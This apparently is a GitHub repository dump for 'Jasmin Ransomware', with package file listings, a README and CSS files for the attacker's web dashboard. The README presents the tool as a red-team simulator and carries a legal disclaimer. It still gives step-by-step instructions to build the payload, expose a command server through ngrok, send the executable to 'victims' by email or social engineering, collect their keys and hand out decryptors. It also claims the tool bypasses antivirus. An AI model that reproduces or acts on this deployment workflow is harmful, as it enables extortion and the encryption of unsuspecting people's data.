Encrypter/packages/Newtonsoft.Json.12.0.3/lib/netstandard2.0/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/portable-net40+sl5+win8+wp8+wpa81/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/portable-net40+sl5+win8+wp8+wpa81/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/portable-net45+win8+wp8+wpa81/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/portable-net45+win8+wp8+wpa81/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/packageIcon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/packageIcon.png -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/SharpCompress.0.24.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/SharpCompress.0.24.0/.signature.p7s -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/SharpCompress.0.24.0/SharpCompress.0.24.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/SharpCompress.0.24.0/SharpCompress.0.24.0.nupkg -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/net35/SharpCompress.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/net35/SharpCompress.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/net45/SharpCompress.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/net45/SharpCompress.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/netstandard1.0/SharpCompress.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/netstandard1.0/SharpCompress.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/netstandard1.3/SharpCompress.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/netstandard1.3/SharpCompress.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/netstandard2.0/SharpCompress.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/SharpCompress.0.24.0/lib/netstandard2.0/SharpCompress.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/.signature.p7s -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/LICENSE.TXT.neki: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/LICENSE.TXT.neki -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/System.Management.4.7.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/System.Management.4.7.0.nupkg -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/THIRD-PARTY-NOTICES.TXT.neki: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/THIRD-PARTY-NOTICES.TXT.neki -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/lib/net45/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/lib/net45/_._ -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/lib/netstandard2.0/System.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/lib/netstandard2.0/System.Management.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/ref/net45/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/ref/net45/_._ -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/ref/netstandard2.0/System.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/ref/netstandard2.0/System.Management.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/runtimes/win/lib/net45/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/runtimes/win/lib/net45/_._ -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/runtimes/win/lib/netcoreapp2.0/System.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/runtimes/win/lib/netcoreapp2.0/System.Management.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/useSharedDesignerContext.txt.neki: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/useSharedDesignerContext.txt.neki -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/System.Management.4.7.0/version.txt.neki: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/System.Management.4.7.0/version.txt.neki -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![Siddhantgour][Instagram-shield]][Instagram-url] [![LinkedIn][linkedin-shield]][linkedin-url] 2 | [![Siddhantgour][Twitter-shield]][Twitter-url] [![Youtube][Youtube-shield]][Youtube-url] [![Telegram][Telegram-shield]][Telegram-url] [![Quora][Quora-shield]][Quora-url] [![Facebook][Facebook-shield]][Facebook-url] 3 |

4 | jasmin ransomware 5 |

6 |

Jasmin The Ransomware

7 | 8 |

9 | A Powerful Ransomware Tool for Security Testing Used by ReadTeams 10 |
11 | Video Tutorial 12 | · 13 | Report Bug 14 | · 15 | Request Free Keygen 16 |

17 |

18 | 19 |
20 | Table of Contents 21 |
    22 |
  1. Disclaimer ⚠️
  2. 23 |
  3. 24 | About The Project 25 | 29 |
  4. 30 |
  5. 31 | Setup & Running 32 | 39 |
  6. 40 |
  7. License
  8. 41 |
  9. Contact
  10. 42 |
43 |
44 | 45 | 46 | ## About The Project 💡 47 |

48 | jasmin ransomware 49 |

50 | 51 |

Please First read the DISCLAIMER ⚠️⚠️

52 | 53 | 54 | 55 | Jasmin is a different kind of ransomware worm by which many of your documents, photos, videos, database and other important files are no longer accessible because they have been encrypted and it becomes impossible for users to access their files without decryption tool and valid key. 56 | This Tool is Developed to help Red teams and ethical hackers simulating a real ransomware attack.
57 | There is really no shortcut for something like this. It's not enough to just know what files could be encrypted, and you certainly don't need a tool to tell you that.
58 | This is a ransomware simulator that can safely encrypt some files on your computer, to let you know if your defenses are actually working. Jasmin Ransomware is developed by security researcher siddhant gour.
59 | 60 | 61 | Why use Jasmin for security testing ?: ?: 62 | * Jasmin Ransomware is developed using C#(.Net Framework) which makes it lighter in weight and easier to embed. 63 | * You Can Simulate a real ransomware attack and bypass any kind of system securities . 64 | * Powerful | Strong Encryption | Centralized Database on Server| Can Bypass Anti Virus. 65 | 66 | ## Built With 🧱 67 | 68 | [![Payload][c#-shield]][c#-url] [![Dashboard][bootstrap-shield]][bootstrap-url] 69 | [![Server][php-shield]][php-url] [![Database][mysql-shield]][mysql-url] 70 | 71 | ## Work Flow 🧾 72 |

73 | jasmin ransomware 74 |

75 | 76 | ## Prerequisites 🧰 77 | 78 | * **Visual Studio 2019 or later**
79 | 80 | * **Xampp Server (Windows) or LAMP Server(Linux)**
81 | 82 | * **Ngrok for port forwarding**
83 | 84 | ## SETUP AND RUNNING 🖥️ 85 | 86 | * ### Clone This Repo 87 | ```sh 88 | git clone https://github.com/codesiddhant/jasmin-ransomware.git 89 | ``` 90 | * ### Webserver & Database 91 | 92 | * **Copy the all the files in webpanel directory to htdocs or (/var/www/html)** 93 | 94 | * **Open Mysql Shell** 95 | 96 |

97 | jasmin ransomware 98 |

99 | 100 | * **Login as Root user** 101 | ```sh 102 | mysql -h localhost -u root 103 | ``` 104 | * **Create new database & assign user** 105 | 106 | ```sh 107 | CREATE DATABASE jasmin_db; 108 | CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456'; 109 | GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost'; 110 | Exit 111 | ``` 112 | 113 | * **Importing jasmin_db.sql file from database directory** 114 | 115 | ```sh 116 | mysql -u jasminadmin -p123456 jasmin_db < htdocs/database/jasmin_db.sql 117 | ``` 118 | * **Loggin Dashboard** 119 | 120 | Open Google Chrome and visit http://localhost/
121 | Use default credentials 122 | ```sh 123 | Username : siddhant 124 | Access Code : 123456 125 | ``` 126 | 127 | * ### Generating Payload 💣 128 | 129 | Note: You should have installed visual studio 2019 or later in your machine 130 | 131 | * **Use ngrok server for port forwarding (Wan Attack)** 132 | 133 | ```sh 134 | ngrok http localhost:80 135 | ``` 136 | 137 | * **Copy Forwarding Address** 138 | 139 |

140 | siddhantgour 141 |

142 | 143 | * **Configure variables**
144 | * => Inside **"Jasmin Encrypter"** directory open "Jasmin Encryptor.sln" file
145 | * => Go to line number 34 & 35
146 | * => Set Ngrok host address for **"hostaddr"** & **"AlertMsgLink"** Variable
147 | 148 |

149 | jasmin ransomware 150 |

151 | 152 | * **Building .Exe File**
153 | * => Go to top nav bar & click to build => Clean Solution
154 | * => Again click to build => Clean Jasmin Encryptor
155 | * => Once Again click to build button => Rebuild Jasmin Encryptor
156 | * => Go to **"Jasmin Encryptor\bin\Release"** directory !! Congrats Payload is ready
157 | 158 | * ### Next Steps 😤 159 | * **Sending File to Victim's Pc**
160 | * Replace the email address inside "webpanel/alertmsg.zip/index.html"
161 | * Now, Send this Payload file to your victims through emails or any socail other engineering technique you want
162 | * When Ever our victim click on that payload file it will encrypt all important files and send the decryption key to our web dashboard
163 | * For Custom alert message to your victims, edit the HTML file inside "webpanel/alertmsg.zip"
164 | 165 | * ### Decryption Process 🔑 166 | * **Decrypting Victims File**
167 | * => open **"Jasmin decryptor\Jasmin decryptor.sln"** & build the .exe file
168 | * => get the **SystemId** from your victims through emails
169 | * => download the Decryption key from web-dashboard for that **SystemId**
170 | * => reply your victims with Decryption Tool and Passsword File
171 | 172 | 173 | ## DISCLAIMER ⚠️ 🚨 174 | * Codesiddhant is a Github Page related to Computer Security and not a site that promotes hacking / cracking / software piracy.
175 | * Do not attempt to violate the law with anything contained here. If you planned to use the tool for illegal purpose, then please leave this site immediately! We will not be responsible for your any illegal actions. Neither administration of this tool, the developer of this application, or anyone else affiliated in any way, is going to accept responsibility for your actions.
176 | * You shall not misuse this tool to harm someone’s computer. However, you may try out these hacks on your own computer at your own risk. Simulating Ransomware attack (without permission) on computers that you do not own is illegal.
177 | * We believe only in White Hat Hacking. On the other hand, we condemn Black Hat Hacking.
178 | * **A ransomware attack is considered to be illegal activity aside from capturing your data in the computer, it will demand you to pay a ransom fee. Encrypting someone’s data without their written permission is a punishable offense**
179 | 180 | 181 | ## License 📝 182 | 183 | Distributed under the MIT License. See `LICENSE` for more information. 184 | 185 | 186 | ## Contact 📞 187 | Wanna Jasmin Pro with custom features ? Dm me
188 |
189 | [![Siddhantgour][Instagram-shield]][Instagram-url] [![LinkedIn][linkedin-shield]][linkedin-url] 190 | [![Siddhantgour][Twitter-shield]][Twitter-url] [![Youtube][Youtube-shield]][Youtube-url] [![Telegram][Telegram-shield]][Telegram-url] [![Quora][Quora-shield]][Quora-url] [![Facebook][Facebook-shield]][Facebook-url] 191 | 192 | 193 | 194 | 195 | 196 | [linkedin-shield]: https://img.shields.io/badge/-LinkedIn-black.svg?style=for-the-badge&logo=linkedin&colorB=555 197 | [linkedin-url]: https://linkedin.com/in/siddhantgour 198 | 199 | [Instagram-shield]: https://img.shields.io/badge/siddhantgour%20-%23E4405F.svg?&style=for-the-badge&logo=Instagram&logoColor=white 200 | [Instagram-url]: https://instagram.com/siddhantgour 201 | [Twitter-shield]: https://img.shields.io/badge/Twitter%20-%231DA1F2.svg?&style=for-the-badge&logo=Twitter&logoColor=white 202 | [Twitter-url]: https://twitter.com/siddhantgour 203 | [Youtube-shield]: https://img.shields.io/badge/Youtube%20-%23FF0000.svg?&style=for-the-badge&logo=Youtube&logoColor=white 204 | [Youtube-url]: https://youtube.com/cyberstair 205 | [Telegram-shield]: https://img.shields.io/badge/Telegram-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white 206 | [Telegram-url]: https://t.me/siddhantgour 207 | [Facebook-shield]: https://img.shields.io/badge/Facebook%20-%231877F2.svg?&style=for-the-badge&logo=Facebook&logoColor=white 208 | [Facebook-url]: https://facebook.com/siddhantgour01 209 | [Stackoverflow-shield]: https://img.shields.io/badge/-Stackoverflow-FE7A16?style=for-the-badge&logo=stack-overflow&logoColor=white 210 | [Stackoverflow-url]: https://stackoverflow.com/users/story/12037921 211 | [Quora-shield]: https://img.shields.io/badge/Quora%20-%23B92B27.svg?&style=for-the-badge&logo=Quora&logoColor=white 212 | [Quora-url]: https://www.quora.com/profile/Siddhant-Gour-1 213 | 214 | 215 | [c#-shield]: https://img.shields.io/badge/Payload%20-%23239120.svg?&style=for-the-badge&logo=c-sharp&logoColor=white 216 | [c#-url]: https://dotnet.microsoft.com/ 217 | [bootstrap-shield]: https://img.shields.io/badge/Dashboard%20-%23563D7C.svg?&style=for-the-badge&logo=bootstrap&logoColor=white 218 | [bootstrap-url]: https://getbootstrap.com/ 219 | [php-shield]: https://img.shields.io/badge/Server-%23777BB4.svg?&style=for-the-badge&logo=php&logoColor=white 220 | [php-url]: https://www.php.net/ 221 | [mysql-shield]: https://img.shields.io/badge/Database-%2300f.svg?&style=for-the-badge&logo=mysql&logoColor=white 222 | [mysql-url]: https://www.mysql.com/ 223 | -------------------------------------------------------------------------------- /Web Panel/alertmsg.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Web Panel/alertmsg.zip -------------------------------------------------------------------------------- /Web Panel/assets/css/loading.css: -------------------------------------------------------------------------------- 1 | @import "http://battlelog.battlefield.com/cdnprefix/local/public/base/fonts/purista/purista.css"; 2 | @-webkit-keyframes title { 3 | 0% { 4 | opacity: 0; 5 | right: 130px; 6 | } 7 | 48% { 8 | opacity: 0; 9 | right: 130px; 10 | } 11 | 52% { 12 | opacity: 1; 13 | right: 30px; 14 | } 15 | 70% { 16 | opacity: 1; 17 | right: 30px; 18 | } 19 | 100% { 20 | opacity: 0; 21 | right: 30px; 22 | } 23 | } 24 | @-moz-keyframes title { 25 | 0% { 26 | opacity: 0; 27 | right: 130px; 28 | } 29 | 48% { 30 | opacity: 0; 31 | right: 130px; 32 | } 33 | 52% { 34 | opacity: 1; 35 | right: 30px; 36 | } 37 | 70% { 38 | opacity: 1; 39 | right: 30px; 40 | } 41 | 100% { 42 | opacity: 0; 43 | right: 30px; 44 | } 45 | } 46 | @-webkit-keyframes fade { 47 | 0% { 48 | opacity: 1; 49 | } 50 | 100% { 51 | opacity: 0; 52 | } 53 | } 54 | @-moz-keyframes fade { 55 | 0% { 56 | opacity: 1; 57 | } 58 | 100% { 59 | opacity: 0; 60 | } 61 | } 62 | @-webkit-keyframes bg { 63 | 0% { 64 | background-color: #306f99; 65 | } 66 | 50% { 67 | background-color: #19470f; 68 | } 69 | 90% { 70 | background-color: #734a10; 71 | } 72 | } 73 | @-moz-keyframes bg { 74 | 0% { 75 | background-color: #306f99; 76 | } 77 | 50% { 78 | background-color: #19470f; 79 | } 80 | 90% { 81 | background-color: #734a10; 82 | } 83 | } 84 | @-webkit-keyframes blink { 85 | 0% { 86 | opacity: 0; 87 | } 88 | 5% { 89 | opacity: 1; 90 | } 91 | 10% { 92 | opacity: 0; 93 | } 94 | 15% { 95 | opacity: 1; 96 | } 97 | 20% { 98 | opacity: 0; 99 | } 100 | 25% { 101 | opacity: 1; 102 | } 103 | 30% { 104 | opacity: 0; 105 | } 106 | 35% { 107 | opacity: 1; 108 | } 109 | 40% { 110 | opacity: 0; 111 | right: -21px; 112 | } 113 | 45% { 114 | opacity: 1; 115 | right: 80px; 116 | } 117 | 50% { 118 | opacity: 0; 119 | right: -21px; 120 | } 121 | 51% { 122 | right: -21px; 123 | } 124 | 55% { 125 | opacity: 1; 126 | } 127 | 60% { 128 | opacity: 0; 129 | } 130 | 65% { 131 | opacity: 1; 132 | } 133 | 70% { 134 | opacity: 0; 135 | } 136 | 75% { 137 | opacity: 1; 138 | } 139 | 80% { 140 | opacity: 0; 141 | } 142 | 85% { 143 | opacity: 1; 144 | } 145 | 90% { 146 | opacity: 0; 147 | right: -21px; 148 | } 149 | 95% { 150 | opacity: 1; 151 | right: 80px; 152 | } 153 | 96% { 154 | right: -21px; 155 | } 156 | 100% { 157 | opacity: 0; 158 | right: -21px; 159 | } 160 | } 161 | @-moz-keyframes blink { 162 | 0% { 163 | opacity: 0; 164 | } 165 | 5% { 166 | opacity: 1; 167 | } 168 | 10% { 169 | opacity: 0; 170 | } 171 | 15% { 172 | opacity: 1; 173 | } 174 | 20% { 175 | opacity: 0; 176 | } 177 | 25% { 178 | opacity: 1; 179 | } 180 | 30% { 181 | opacity: 0; 182 | } 183 | 35% { 184 | opacity: 1; 185 | } 186 | 40% { 187 | opacity: 0; 188 | right: -21px; 189 | } 190 | 45% { 191 | opacity: 1; 192 | right: 80px; 193 | } 194 | 50% { 195 | opacity: 0; 196 | right: -21px; 197 | } 198 | 51% { 199 | right: -21px; 200 | } 201 | 55% { 202 | opacity: 1; 203 | } 204 | 60% { 205 | opacity: 0; 206 | } 207 | 65% { 208 | opacity: 1; 209 | } 210 | 70% { 211 | opacity: 0; 212 | } 213 | 75% { 214 | opacity: 1; 215 | } 216 | 80% { 217 | opacity: 0; 218 | } 219 | 85% { 220 | opacity: 1; 221 | } 222 | 90% { 223 | opacity: 0; 224 | right: -21px; 225 | } 226 | 95% { 227 | opacity: 1; 228 | right: 80px; 229 | } 230 | 96% { 231 | right: -21px; 232 | } 233 | 100% { 234 | opacity: 0; 235 | right: -21px; 236 | } 237 | } 238 | body { 239 | font-family: Purista,sans-serif, arial; 240 | background: black; 241 | color: #eaf7ff; 242 | } 243 | 244 | .wrap { 245 | position: absolute; 246 | top: 50%; 247 | left: 50%; 248 | margin-left: -80px; 249 | margin-top: -40px; 250 | } 251 | 252 | .bg { 253 | padding: 30px 30px 30px 0; 254 | background: #306f99; 255 | -moz-animation: bg 1.5s linear infinite; 256 | -webkit-animation: bg 1.5s linear infinite; 257 | animation: bg 1.5s linear infinite; 258 | -moz-box-shadow: inset 0 0 45px 30px black; 259 | -webkit-box-shadow: inset 0 0 45px 30px black; 260 | box-shadow: inset 0 0 45px 30px black; 261 | } 262 | 263 | .loading { 264 | position: relative; 265 | text-align: right; 266 | text-shadow: 0 0 6px #bce4ff; 267 | height: 20px; 268 | width: 150px; 269 | } 270 | .loading span { 271 | display: block; 272 | text-transform: uppercase; 273 | position: absolute; 274 | right: 30px; 275 | height: 20px; 276 | width: 200px; 277 | line-height: 20px; 278 | } 279 | .loading span:after { 280 | content: ""; 281 | display: block; 282 | position: absolute; 283 | top: -2px; 284 | right: -21px; 285 | height: 20px; 286 | width: 16px; 287 | background: #eaf7ff; 288 | -moz-box-shadow: 0 0 15px #bce4ff; 289 | -webkit-box-shadow: 0 0 15px #bce4ff; 290 | box-shadow: 0 0 15px #bce4ff; 291 | -moz-animation: blink 3.4s infinite; 292 | -webkit-animation: blink 3.4s infinite; 293 | animation: blink 3.4s infinite; 294 | } 295 | .loading span.title { 296 | -moz-animation: title 3.4s linear infinite; 297 | -webkit-animation: title 3.4s linear infinite; 298 | animation: title 3.4s linear infinite; 299 | } 300 | .loading span.text { 301 | -moz-animation: title 3.4s linear 1.7s infinite; 302 | -webkit-animation: title 3.4s linear 1.7s infinite; 303 | animation: title 3.4s linear 1.7s infinite; 304 | opacity: 0; 305 | } 306 | -------------------------------------------------------------------------------- /Web Panel/assets/css/notfound.css: -------------------------------------------------------------------------------- 1 | @import url(https://fonts.googleapis.com/css?family=Roboto:400,700); 2 | body { 3 | background:#131c31; 4 | color: white; 5 | font-family: "Roboto", sans-serif; 6 | } 7 | body h1 { 8 | margin-bottom: 20px; 9 | } 10 | body p { 11 | font-size: 18px; 12 | line-height: 30px; 13 | } 14 | body a { 15 | color: #FBD160; 16 | } 17 | 18 | svg { 19 | display: block; 20 | margin: 0 auto; 21 | overflow: visible !important; 22 | } 23 | svg #robot_1_ { 24 | animation-name: verticalAnimation; 25 | animation-duration: 1s; 26 | animation-iteration-count: infinite; 27 | animation-direction: alternate; 28 | animation-timing-function: ease-in-out; 29 | } 30 | svg #light_1_ { 31 | animation-name: blinkLight; 32 | animation-duration: 0.5s; 33 | animation-iteration-count: infinite; 34 | animation-direction: alternate; 35 | animation-timing-function: steps(2); 36 | } 37 | svg #leftEye_1_, svg #rightEye_1_ { 38 | animation-name: blinkEye; 39 | animation-duration: 1.8s; 40 | animation-iteration-count: infinite; 41 | animation-direction: alternate; 42 | animation-timing-function: linear; 43 | transform-origin: 50% 50%; 44 | } 45 | svg #leftArm_1_ { 46 | animation-name: moveLeftArm; 47 | animation-duration: 1s; 48 | animation-iteration-count: infinite; 49 | animation-direction: alternate; 50 | animation-timing-function: ease-in-out; 51 | transform-origin: 50% 10%; 52 | transition: all; 53 | } 54 | svg #rightArm_1_ { 55 | animation-name: moveRightArm; 56 | animation-duration: 1s; 57 | animation-iteration-count: infinite; 58 | animation-direction: alternate; 59 | animation-timing-function: ease-in-out; 60 | transform-origin: 50% 10%; 61 | } 62 | svg #shadow_1_ { 63 | animation-name: shadowAnimation; 64 | animation-duration: 1s; 65 | animation-iteration-count: infinite; 66 | animation-direction: alternate; 67 | animation-timing-function: ease-in-out; 68 | transform-origin: 50%; 69 | } 70 | 71 | @keyframes wave { 72 | 0% { 73 | transform: rotate(120deg); 74 | } 75 | 100% { 76 | transform: rotate(170deg); 77 | } 78 | } 79 | @keyframes moveLeftArm { 80 | 0% { 81 | transform: rotate(0); 82 | } 83 | 100% { 84 | transform: rotate(4deg); 85 | } 86 | } 87 | @keyframes moveRightArm { 88 | 0% { 89 | transform: rotate(0); 90 | } 91 | 100% { 92 | transform: rotate(-4deg); 93 | } 94 | } 95 | @keyframes shadowAnimation { 96 | 0% { 97 | transform: scale(1); 98 | opacity: 0.4; 99 | } 100 | 100% { 101 | transform: scale(1.15); 102 | opacity: 0.6; 103 | } 104 | } 105 | @keyframes verticalAnimation { 106 | 0% { 107 | transform: translateY(-10px); 108 | } 109 | 100% { 110 | transform: translateY(10px); 111 | } 112 | } 113 | @keyframes blinkLight { 114 | 0% { 115 | opacity: 0; 116 | } 117 | 100% { 118 | opacity: 1; 119 | } 120 | } 121 | @keyframes blinkEye { 122 | 0% { 123 | transform: scaleY(0); 124 | } 125 | 4% { 126 | transform: scaleY(1); 127 | } 128 | } -------------------------------------------------------------------------------- /Web Panel/assets/css/style1.css: -------------------------------------------------------------------------------- 1 | @import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:300&display=swap"); 2 | html, body { 3 | font-family: 'Source Code Pro', monospace; 4 | background: #000; 5 | } 6 | 7 | .container { 8 | height: 100vh; 9 | width: 100vw; 10 | } 11 | 12 | .loader { 13 | position: absolute; 14 | top: 50%; 15 | left: 50%; 16 | -webkit-transform: translate(-50%, -50%); 17 | transform: translate(-50%, -50%); 18 | width: 200px; 19 | height: 200px; 20 | background-color: rgba(34, 47, 62, 0.2); 21 | box-shadow: 0 0 24px 4px rgba(142, 68, 173, 0.2); 22 | border-radius: 50%; 23 | text-align: center; 24 | overflow: hidden; 25 | } 26 | .loader:before { 27 | content: ''; 28 | position: absolute; 29 | top: -1px; 30 | left: -1px; 31 | width: calc(100% + 2px); 32 | height: calc(100% + 2px); 33 | border-radius: 50%; 34 | background-image: radial-gradient(circle, transparent 68%, #8e44ad 70%); 35 | box-shadow: inset 0 0 0 0 rgba(142, 68, 173, 0); 36 | -webkit-animation: Glow 5s infinite ease-in-out; 37 | animation: Glow 5s infinite ease-in-out; 38 | } 39 | .loader:after { 40 | content: ''; 41 | position: absolute; 42 | top: 50%; 43 | left: 50%; 44 | -webkit-transform: translate(-50%, -50%) rotate(0); 45 | transform: translate(-50%, -50%) rotate(0); 46 | -webkit-transform-origin: 50% 50%; 47 | transform-origin: 50% 50%; 48 | width: calc(100% - 4px); 49 | height: calc(100% - 4px); 50 | z-index: 999; 51 | border: solid 2px #f39c12; 52 | border-radius: 50%; 53 | border-bottom-color: transparent; 54 | border-left-color: transparent; 55 | border-right-color: transparent; 56 | -webkit-animation: Spin 1.5s infinite linear; 57 | animation: Spin 1.5s infinite linear; 58 | } 59 | 60 | .loader-text { 61 | display: block; 62 | position: absolute; 63 | top: 50%; 64 | left: 50%; 65 | -webkit-transform: translate(-50%, -50%); 66 | transform: translate(-50%, -50%); 67 | color: #8e44ad; 68 | letter-spacing: 12px; 69 | text-shadow: 0 0 24px rgba(142, 68, 173, 0.8); 70 | -webkit-animation: Pulse 5s infinite linear; 71 | animation: Pulse 5s infinite linear; 72 | } 73 | .loader-text:before { 74 | content: attr(data-flicker-0); 75 | position: absolute; 76 | left: 0; 77 | color: #8e44ad; 78 | opacity: 0; 79 | text-shadow: 0 0 16px rgba(142, 68, 173, 0); 80 | -webkit-animation: Flicker 3s infinite linear; 81 | animation: Flicker 3s infinite linear; 82 | } 83 | .loader-text:after { 84 | content: attr(data-flicker-1); 85 | position: absolute; 86 | right: 0; 87 | color: #8e44ad; 88 | opacity: 0; 89 | text-shadow: 0 0 16px rgba(142, 68, 173, 0); 90 | -webkit-animation: Flicker 3s infinite linear; 91 | animation: Flicker 3s infinite linear; 92 | -webkit-animation-delay: .5s; 93 | animation-delay: .5s; 94 | } 95 | 96 | @-webkit-keyframes Glow { 97 | 50% { 98 | box-shadow: inset 0 0 24px 4px rgba(142, 68, 173, 0.8); 99 | } 100 | } 101 | 102 | @keyframes Glow { 103 | 50% { 104 | box-shadow: inset 0 0 24px 4px rgba(142, 68, 173, 0.8); 105 | } 106 | } 107 | @-webkit-keyframes Spin { 108 | 50% { 109 | opacity: 0.2; 110 | } 111 | 100% { 112 | -webkit-transform: translate(-50%, -50%) rotate(360deg); 113 | transform: translate(-50%, -50%) rotate(360deg); 114 | } 115 | } 116 | @keyframes Spin { 117 | 50% { 118 | opacity: 0.2; 119 | } 120 | 100% { 121 | -webkit-transform: translate(-50%, -50%) rotate(360deg); 122 | transform: translate(-50%, -50%) rotate(360deg); 123 | } 124 | } 125 | @-webkit-keyframes Pulse { 126 | 50% { 127 | color: rgba(142, 68, 173, 0.5); 128 | text-shadow: 0 0 24px rgba(142, 68, 173, 0.4); 129 | } 130 | } 131 | @keyframes Pulse { 132 | 50% { 133 | color: rgba(142, 68, 173, 0.5); 134 | text-shadow: 0 0 24px rgba(142, 68, 173, 0.4); 135 | } 136 | } 137 | @-webkit-keyframes Flicker { 138 | 0% { 139 | opacity: 0.1; 140 | color: #8e44ad; 141 | text-shadow: 0 0 16px #8e44ad; 142 | } 143 